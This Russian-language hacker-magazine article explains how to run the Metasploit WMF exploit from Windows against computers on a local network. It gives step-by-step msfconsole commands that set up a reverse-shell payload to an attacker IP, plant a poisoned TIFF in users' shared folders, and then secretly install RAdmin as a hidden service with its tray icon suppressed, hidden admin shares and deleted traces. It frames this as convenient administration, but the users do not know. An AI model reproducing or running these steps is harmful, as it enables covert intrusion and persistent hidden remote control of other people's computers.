Кто не слышал про WMF-баг, с помощью которого можно получить шелл-доступ к
практически любому компьютеру использующему системную библиотеку для обработки
WMF-файлов? Наверное мало кто, особенно после разгромной статьи в
февральском номере
журнала
. Однако, многие Win-пользователи, читающие журнал ][, не смогли его
использовать по следующим причинам:

  1. Отсутствие доступа к никсовому шеллу на удалённом компьютере;
  2. Слабое знание других систем: FreeBSD, LINUX;

Возникает вопрос: зачем ломать WIN–компьютеры с никсовых шеллов? Почему бы не
протестировать эксплоит в родной среде, спросите вы? Не будем разбирать
экзотические варианты, типа работы под Virtual PC или WMWARE альтернативных
систем, а также Cygwin (хотя без него не обойтись, смотри далее). Сделаем всё
проще, запустим перловый эксплоит в Windows.

Всё протестировано на двух Windows XP
SP2 в локальной сети и работает.

На диске ][ лежал пакет Metasploit Fгаmеwork — но он для никсов! Хотя и в его
составе есть сплоит ie_xp_pfv_metafile.pm. На практике, при запуске в Active
perl for Win32, он не работает, точнее не работает весь пакет Metasploit
Fгаmеwork 2.5. Идём по ссылке

http://www.metasploit.com/projects/Framework/downloads.html
и скачиваем —
“Metasploit fгаmеwork 2.5 Win32 Cygwin Installer”, запускаем MSFConsole , делаем
ls exploits и с сожалением обнаруживаем, что ie_xp_pfv_metafile.pm там нет! Вот
облом… Где взять? Ответ прост: на DVD ][ или скачать Metasploit ifгаmеwork 2.5
для никсов – в этом пакете он присутствует! То есть достаточно его
перекопировать в папку exploits и пользоваться на здоровье. Вот так, для
Win-пользователей всё упрощается.

Что делать дальше, когда вы получили шелл-доступ с правами системы к
удалённому компьютеру с Windows, зависит от вашей фантазии. Для примера
расскажу, что можно сделать в локальной сети для пользы (точнее для упрощённого
администрирования WIN-систем администратором).

1. Удалённая скрытая установка RAdmin

Не всегда есть доступ к компьютеру пользователя (компьютер занят
пользователем, далеко и т. д.). Поэтому воспользуемся WMF – багом и поставим на
его компьютер RA удалённо, по локальной сети. Как правило (у нас в локалке,
например) каждый юзверь имеет расшаренную папку, разрешённую для записи и в
основном пользуется стандартным проводником (никуда от него не деться –
стандартная оболочка, используется в любой программе – файл\открыть
файл\сохранить).

Запускаем консоль MSFConsole и дальше:

msf > use ie_xp_pfv_metafile – будем использовать сплоит для WMF
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse – цепляем реверс-шелл для
win32
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST ххх.ххх.ххх.ххх –
устанавливаем IP куда будет коннектится реверс-шелл
LHOST -> xxx.xxx.xxx.xxx
msf ie_xp_pfv_metafile(win32_reverse) > exploit – запускаем эксплоит
[*] Starting Reverse Handler.
[*] Waiting for connections to http://ххх.ххх.ххх.ххх:8080/ — поднимается
Web-сервер на ранее указанном адресе и ждёт подключений.

Через IE на нашей системе зайдём на этот Web-сервер и опа… взломаем сами себя
(ну это не страшно). В консоли сделаем exit и не будем над собой издеваться.

Теперь зайдём в IE в Сервис\Свойства\Общие\Параметры…\Просмотр файлов…. И
найдём ядовитый tiff-файл, содержащий шелл-код, имя файла будет что-то типа
«M16R14KtkTuEys0Iqt9M4vqK3ny4Kh1vem[2].tiff». Остаётся скопировать этот файл в
папку юзверя (предварительно подняв web-сервер ещё раз на своём компьютере) и
ждать когда он откроет папку, содержащую наш ядовитый файл с шелл-кодом.

Дождались соединения, юзверь в этот момент ничего не заметит (если не
посмотрит в процессы и не увидит там cmd.exe).

Дальше зальём ему RA (предварительно упаковав в SFX-архив RA.exe сам
r_server.exe и две необходимые библиотеки AdmDll.dll, raddrv.dll, а так же
reg-файл для скрытия иконки r_server`a в трее Hide_RA.reg – он меняет один ключ,
вот его содержание:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"DisableTrayIcon"=hex:01,00,00,00

Примечание:

Для упаковки в SFX-архив (самораспаковывающийся архив) использовал WinRAR v.
3.2 со следующими параметрами:

Path=.\%SystemRoot%\system32\
SavePath
Silent=1
Overwrite=2

Можете задать другие, но на мой взгляд это оптимальные. Далее в консоли (уже
в консоли cmd) пишем:

cd \ `перейти в корень
диска

cd %SystemRoot%\system32 `
задаём текущую папку
system32

net share C$$=C: `
расшариваем диск C: юзверя – он
невидим в сетевом окружении

net share D$$=D: `
расшариваем диск D: тоже (не
знаем где система стоит, может и на D:)

copy /y \\имя компьютера_\Папка_RA\ra.exe %SystemRoot%\system32 `
копируем
архив RA в системную папку юзверя

cmd /c ra.exe `
распаковываем всё необходимое для
установки r_server и запуска его в скрытом режиме

r_server /install /silence `
инсталлируем
r_server.exe в скрытом режиме как службу

reg import Hide_RA.reg `
скрываем иконку
r_server.exe в трее

r_server /start /silence `
запускаем скрытно службу
r_server.exe

`
Всё, r_server.exe ждёт подключений клиента…
delete ra.exe `
удаляем архив

net share C$$ /delete `
удаляем шары
net share D$$ /delete
exit `
выходим из консоли cmd

Можно включить в архив run.cmd файл вида:

r_server /silence /install
reg import Hide_RA.reg
r_server /silence /start
delete ra.exe
net share C$$ /delete
net share D$$ /delete
exit

Тогда после «cmd /c ra.exe» в консоли надо запустить на исполнение его,
например так:

cmd /c run.cmd `инсталлируем
и запускаем службу r_server, затем убираем следы

exit `
выходим из консоли cmd (шелла удалённого
компьютера) в консоль MFS

msf ie_xp_pfv_metafile(win32_reverse) > exploit `и
так далее остальных юзверей…

2. Удалённое превращение Windows_XP_SP2 в сервер win-терминалов.

Компьютер с сервером терминалов позволяет подключится к нему по типу
удалённого рабочего стола, только без выхода из системы основного пользователя,
а в отдельном сеансе, т. е. позволит работать за компьютеров как минимум двум
пользователям одновременно, одному из них удалённо.

Работы ведутся. Продолжение следует?

Оставить мнение

Check Also

LUKS container vs Border Patrol Agent. Как уберечь свои данные, пересекая границу

Не секрет, что если ты собрался посетить такие страны как США или Великобританию то, прежд…